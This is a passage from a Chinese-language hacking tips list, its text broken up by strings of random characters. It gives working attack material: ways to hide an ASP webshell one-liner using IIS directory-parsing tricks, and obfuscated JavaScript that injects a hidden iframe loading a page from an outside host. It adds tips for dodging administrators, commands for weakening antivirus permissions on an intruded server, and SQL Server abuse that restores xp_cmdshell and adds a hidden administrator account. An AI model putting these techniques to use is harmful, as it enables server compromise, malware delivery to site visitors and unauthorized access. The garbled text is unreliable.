8 P1 e; q. p1 u9 ^用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。+ A5 D4 O( a! M: o
8 U' O0 e. c/ }# a+ T53、隐藏ASP后门的两种方法
A: ~6 O' B& f# X0 w2 a1、建立非标准目录:mkdir images..\
7 @/ F% \+ r/ {/ ^, v3 ^拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
9 E7 D2 O5 Q* \! g" [; k. |通过web访问ASP木马:http://ip/images../news.asp?action=login. K- x& o9 x! s8 w0 G
如何删除非标准目录:rmdir images..\ /s+ ^( r" B4 m f) ]
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
7 ^0 c* q- R0 S, [9 g+ `9 Umkdir programme.asp5 s* B8 {4 H4 n2 e1 P
新建1.txt文件内容:<!--#include file=”12.jpg”-->5 {5 A8 ?3 P; K3 v
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件" B3 }4 v# f& M6 p4 D% h
attrib +H +S programme.asp5 Z4 ]) i! D; n
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
( ~$ d/ j9 _+ k. F
* s) p! h- n2 v' \0 n6 \- G54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。4 K2 B7 p. r# Q8 E; l
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。7 ~' P6 }2 o) X8 d9 r. W: i0 d
: A/ ^8 j& E8 ^; [ c8 U A, R55、JS隐蔽挂马% L. p2 u Q1 g, {* M+ m
1.( o& W2 d; U7 ~3 Z
var tr4c3="<iframe src=ht";5 N0 L7 U/ ]5 Q+ Z; h* d9 @( y" O
tr4c3 = tr4c3+"tp:/";5 w0 |2 d ?/ e. }. Q% P
tr4c3 = tr4c3+"/ww";: m3 T, F" m+ ?4 X* b2 l# \
tr4c3 = tr4c3+"w.tr4";
2 ?+ j7 {* G4 l4 ^% P/ mtr4c3 = tr4c3+"c3.com/inc/m";
[& J! H' v4 ~# S1 Q3 R0 C4 Str4c3 = tr4c3+"m.htm style="display:none"></i";
+ s4 p) ]& d qtr4c3 =tr4c3+"frame>'";. s: h! o. O# D/ Q' t! X! N
document.write(tr4c3);; r) a8 ~2 _8 P( X
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
7 ~6 J7 x( L) c8 t
# U- ^* D; I( m2.
- ?# B# f) \( A0 U0 ?, i. Z转换进制,然后用EVAL执行。如0 I( B( E& _" u( }. M/ i* C3 z& w
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
# ^' e4 d+ e0 G0 l不过这个有点显眼。
! i0 N: c5 W" n3.
3 ]4 n3 X( x1 N2 P2 J. y+ Qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
6 n4 C1 ?8 H' i$ F0 f" P最后一点,别忘了把文件的时间也修改下。, q$ i' z; n: f2 R
' P2 w. x+ r4 u7 ]56.3389终端入侵常用DOS命令
! ~! H. f, _2 ~3 Dtaskkill taskkill /PID 1248 /t
1 @3 U1 ?9 x! P! X" N/ D: n& Y9 d) ]6 H& L7 L7 B/ o
tasklist 查进程
9 o9 d: F$ M- f3 S }3 Y @1 I) `7 b$ U9 A# k* v' k: k
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
9 ~; |- W/ S W8 M: q# Q$ siisreset /reboot. C }' [3 p" a7 \
tsshutdn /reboot /delay:1 重起服务器% |; N# {3 u+ p. ]& C
% q8 K5 i. D2 I4 Y0 {1 h) Q
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
' s: O5 u u, X0 C0 _3 ~3 }- V2 R* W. h" B$ H; ^
query user 查看当前终端用户在线情况
3 q" B: }1 j- ^ T6 {
6 ]; H1 C U6 y3 H3 P/ [, o% U1 z要显示有关所有会话使用的进程的信息,请键入:query process *
K$ ^! C9 @: P. R* ~7 j3 D9 I7 p: l, \* w" t+ i9 e; m1 _
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2: g: b, i: Y7 b# B+ K8 }
, s. t& `) c1 x5 G要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
. D; O' X9 R! d# u8 @0 v5 `) [9 _$ M1 t J6 N& m3 Q) p( _
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
% z4 A' ]+ x9 a: R$ N' o* ]
" ~. X" ]" h6 J X命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启' P5 P2 M! {9 c; r8 E) J
0 ^! A x/ }% T/ B5 z7 H" j命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
7 }" t) Q7 ^# k
1 K$ F. R! ~, q( T命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
6 S; p# q; a; a7 Y" P$ u6 S4 B
}+ i: |0 a |4 }命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机- A8 i& `) K5 F7 G, E/ G
5 W3 j* F/ v0 Y; V/ W$ r56、在地址栏或按Ctrl+O,输入:6 r6 w6 h9 l+ I; c" M$ r2 D
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;0 V" W8 M( }' o8 e" ^) y% z3 d
* A9 n1 M' R# g0 t; u7 P2 B
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。0 j, k% U; k4 r" S: }8 n, B
# {. u2 A; [0 F# y- g! G
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
+ t8 Z4 T2 _- o+ q6 u用net localgroup administrators是可以看到管理组下,加了$的用户的。
6 w! F/ S* H. G/ x' j" L. D
" l2 |+ C- _9 ^+ m1 ]' p58、 sa弱口令相关命令
5 e! N8 Y% O4 J, R! E4 ^) z n7 t1 T4 G: I
一.更改sa口令方法:$ {8 L$ D$ D5 i
用sql综合利用工具连接后,执行命令:; v# a8 n( W* H7 w, B
exec sp_password NULL,'20001001','sa'& d0 g# u5 O# K% W
(提示:慎用!)( h6 s: E% m0 M( W
- v$ B6 P# m* u% J$ k3 l- p二.简单修补sa弱口令.9 d0 V; E" t( z, l, O7 h; ^. w
2 a5 D5 `, n5 O! c( D9 R6 W r; o7 E
方法1:查询分离器连接后执行:2 J/ J4 {+ U2 k4 F6 i; X
if exists (select * from7 o/ a/ x! Z! g" U
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
2 ]% m% i; A5 XOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
: l/ O% F0 D3 b- X) S% L: B) | @' l+ o" e) K* D' e- v4 q6 F# v) k
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'; e) p2 B. ^5 p4 L v9 b
$ X2 f ~. v. p Q! ?5 bGO
5 J( H* Y/ t6 R9 W9 d/ N6 p- ~0 D3 ]' x4 c% X3 W$ V
然后按F5键命令执行完毕
8 c3 k @0 ]0 |1 c
6 Y; i* i, q8 K* g2 ^0 g. F方法2:查询分离器连接后
6 Q% c6 w5 ~& Z$ A; I5 Q8 y第一步执行:use master
6 g: l& \* s5 m% B! y% |8 _第二步执行:sp_dropextendedproc 'xp_cmdshell'; S6 y+ L4 e* d- ~8 o/ l
然后按F5键命令执行完毕* j$ ]; D8 `: V8 h1 p
" M8 ]# l0 }* w/ l9 _4 P r
& d/ Q. M5 ~' K7 n) F5 {5 @三.常见情况恢复执行xp_cmdshell.
$ z9 V* P! p! l. o6 B5 t8 @2 q- ]! Z# E
9 f' G+ y3 Z4 Y5 c! j1 L1 未能找到存储过程'master..xpcmdshell'.
, f% t- P1 {4 c2 s6 B- `( F 恢复方法:查询分离器连接后,
+ ~1 L# E- Y( h" P: h; K0 ^! V5 M' d第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 f2 K/ K ]6 s. C第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% ?2 `; J- O0 k# v然后按F5键命令执行完毕+ E7 g: j2 V/ ?# O$ j. b0 j
1 Q3 o5 c6 {: s
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
1 W$ n7 B2 s0 `) ?4 d- W9 {, I恢复方法:查询分离器连接后,
8 C" X$ e, B" z1 f第一步执行:sp_dropextendedproc "xp_cmdshell"2 O$ W ?% L1 M; X$ [
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'9 Y. Y" N1 x# G4 \ R: F
然后按F5键命令执行完毕
0 u4 O% S! y4 a" t6 i& N/ [
( n/ B8 V1 e! V0 F' \8 C3 f2 T/ \3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
% g @+ {' t$ i. c9 H! V. B Z恢复方法:查询分离器连接后,
! N3 H6 k* f& W, G, H第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
( I7 p5 ^! [" O# ?9 I第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
/ G. e1 i0 t0 I& o然后按F5键命令执行完毕2 s4 I) `, Z. H
1 A1 s# z. w9 w' F: {
四.终极方法.
& \! N8 n. _6 r, m; J5 V3 J8 X, r0 S如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 C0 w$ W# [4 { ?) x查询分离器连接后,
6 h% v3 M3 X! d g+ ]/ G$ X( v2000servser系统:
0 R3 b4 n4 J$ G6 [$ _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
! E# c; o) q8 B0 n; o# }' c$ T8 Z4 t# ]* y/ v) s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'- {5 I& v* g, }& F. G. S" W
# C5 y& w$ ?% Y$ P. s9 y! Mxp或2003server系统:
" f$ p: W- D: N; f% l8 K, ]5 E3 P0 \) o
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
: k9 Y9 |9 x7 p Z3 X2 g$ K1 c$ _+ I8 ]) L0 v
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'3 ?/ a, n5 a( k0 d. c) q4 r$ ^, g4 s) G
|